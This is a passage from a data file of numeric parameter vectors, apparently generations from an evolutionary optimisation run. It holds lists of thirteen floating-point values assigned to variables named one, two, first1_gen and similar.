131702579310.68652]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, \n 133211383937.09729]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, \n 143105235055.608]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, \n 143860615432.91934]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, \n 145092770865.8836]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, \n 155477031697.76462]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, \n 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, \n 158587944243.89005]\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, \n -1.7352085678160897e-10, 
-1.82610373802557e-15, 7.430575474541962e-16, \n 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, \n 180430143233.58368]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15,\n 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, \n 183449646874.34637]\n[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, \n 191076754457.2524]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, \n -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, \n 194275355409.06598]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11,\n -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08,\n 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, \n 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4682044872577598e-08, 8.724478065416361e-10, 
82147238279.93182, \n 198112832281.90573]\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, \n 115813093887.0164]\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06,\n -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, \n 118508631814.89664]\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, \n 119478476003.54858]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, \n 119746195767.88297]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, \n 120002114057.9749]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.1981340041661674e-12, 
-2.0952905567462806e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, \n 124495463707.0261]\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, \n 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, \n 127226107362.62663]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, \n 128048566261.66084]\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, \n 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, \n 129146670219.88675]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, \n 132556338910.10567]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, \n 132653030892.18918]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 
7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, \n 140436120253.29218]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, \n 143105235055.60883]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, \n 143860615432.91846]\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, \n 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, \n 144269444777.14786]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, \n 145085114899.6645]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15,\n 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 
8.750599822793858e-10, 118220156709.04602, \n 145085114900.12366]\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, \n 145590447784.79443]\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, \n 153694065180.84283]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, \n 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, \n 154263245256.49524]\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, \n 164710456294.5225]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, \n 170174200265.44513]\n",
"step-3": "one = [7.236287049225701e-06, -1.445911565527231e-12, -\n 1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10,\n -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, \n -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10,\n 135323228000.64511, 130464457208.5385]\ntwo = [6.101651991514008e-06, -1.2764740103418866e-12, -\n 1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, \n -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05,\n -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10,\n 194360719320.3122, 75684271432.82758]\nthree = [6.4442734160126695e-06, -1.2463732938819767e-12, -\n 1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, \n -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, \n -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, \n 40874176708.45886, 129961018217.7445]\nfour = [5.591985036569838e-06, -1.5732644861037622e-12, -\n 1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, \n -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, \n -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10,\n 95538034865.65512, 192689393537.75766]\nfive = [5.9877501684316964e-06, -1.4725222964411265e-12, -\n 2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, \n -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, \n -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10,\n 172629547544.72174, 121012464101.10771]\nsix = [6.525636151737385e-10, -1.5516831882387681e-12, -\n 1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10,\n -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497687e-05,\n -1.9757021060346727e-06, -1.5031696163247857e-08, 8.945619840357268e-10,\n 99871865434.22476, 123933224114.80229]\nfirst1_gen = [[6.417695307686038e-06, 
-1.2416886913890308e-12, -\n 1.791907685050265e-13, 3.983180616117193e-11, -7.243488055496258e-11, -\n 1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, \n -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10,\n 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -\n 1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11,\n -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, \n 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08,\n 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [\n 7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13,\n 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15,\n 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, \n -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, \n 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, \n -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10,\n -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05,\n -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10,\n 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -\n 1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11,\n -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16,\n 2.2287538734129395e-05, -1.8740196054647742e-06, -\n 1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, \n 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -\n 1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10,\n -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05,\n -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10,\n 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -\n 1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, \n -2.5320893657294154e-10, 
-2.1583737575101563e-15, 3.210132219509301e-16,\n 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08,\n 9.214909160927855e-10, 154168790181.56195, 151975095946.00134], [\n 6.4442734160126695e-06, -1.5732644861037622e-12, -\n 1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -\n 2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, \n -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10,\n 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -\n 1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11,\n -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16,\n 2.7105518268805634e-05, -1.9663482803776534e-06, -\n 1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, \n 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -\n 1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10,\n -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05,\n -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10,\n 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -\n 1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11,\n -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16,\n 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, \n 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [\n 6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13,\n 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15,\n 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, \n -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, \n 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -\n 1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, \n -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, \n 
-1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, \n 1374938673042.5493, 4524615824537.332], [5.6149092148265474e-06, -\n 1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, \n -2.335516269047763e-10, -2.1416544930348844e-15, 3.3108330528832777e-16,\n 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, \n 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [\n 6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13,\n 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15,\n 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, \n -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, \n 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -\n 2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, \n -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -\n 1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10,\n 3105580314530.341, 4622017117439.275]]\nsecond1_gen = [[6.473615077297489e-06, -1.2416886913890308e-12, -\n 1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, \n -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05,\n -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10,\n 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -\n 1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11,\n -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, \n 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08,\n 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [\n 7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13,\n 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15,\n 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06,\n -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, \n 
440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -\n 1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, \n -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05,\n -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, \n 90541420172.20418, 503189560104.03455], [6.417695307686038e-06, -\n 1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11,\n -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16,\n 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08,\n 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [\n 7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13,\n 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15,\n 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06,\n -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, \n 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -\n 1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10,\n -1.1298867172210502e-15, 3.273827033054119e-16, 2.71828464025051e-05, -\n 1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, \n 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -\n 1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11,\n -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16,\n 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, \n 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [\n 5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13,\n 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15,\n 3.2670998922499434e-16, 2.2375793269713536e-05, -1.8912926681237391e-06,\n -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, \n 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -\n 2.0184675219747084e-13, 
3.996761820973954e-11, -7.30077645678233e-11, -\n 1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05,\n -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10,\n 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -\n 1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11,\n -2.5212090845365535e-10, -1.1547640084684547e-15, \n 3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06,\n -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, \n 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, \n -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11,\n -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, \n -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, \n 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -\n 1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11,\n -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16,\n 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08,\n 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], [\n 6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, \n 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15,\n 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06,\n -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, \n 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -\n 1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10,\n -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05,\n -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10,\n 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -\n 1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, \n -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16,\n 
2.5052523082312023e-05, -1.9593459141604013e-06, -\n 1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, \n 313686240874.89294]]\nthird1_gen = [[6.428534934734018e-06, -1.2348251959432863e-12, -\n 1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -\n 1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, \n -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10,\n 35914970214.05617, 208658422545.5101], [6.449609175276781e-06, -\n 1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11,\n -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16,\n 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08,\n 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [\n 6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13,\n 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, \n 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, \n -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, \n 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -\n 1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -\n 1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, \n -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10,\n 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -\n 1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, \n -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16,\n 2.6978084672522227e-05, -1.9285560276423494e-06, -\n 1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, \n 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -\n 1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, \n -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, \n -1.9365154780516644e-06, -1.4736235919210341e-08, 
9.02573445716291e-10,\n 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -\n 1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11,\n -7.250728822785179e-11, -1.1805107762756462e-15, 3.880180132520679e-16,\n 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08,\n 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [\n 6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13,\n 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15,\n 3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, \n -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, \n 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -\n 1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, \n -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05,\n -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10,\n 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -\n 1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, \n -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16,\n 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08,\n 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [\n 6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13,\n 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15,\n 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -\n 1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, \n 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -\n 1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, \n -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05,\n -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, \n 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -\n 
1.436844524248817e-12, -1.766513283684079e-13, 3.940038642964773e-11, -\n 7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16,\n 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, \n 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], [\n 6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13,\n 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15,\n 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06,\n -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, \n 886246867017.2574], [6.5292806963971566e-06, -1.2521788644307235e-12, -\n 1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -\n 1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, \n -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10,\n 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -\n 1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, \n -7.177949793819456e-11, 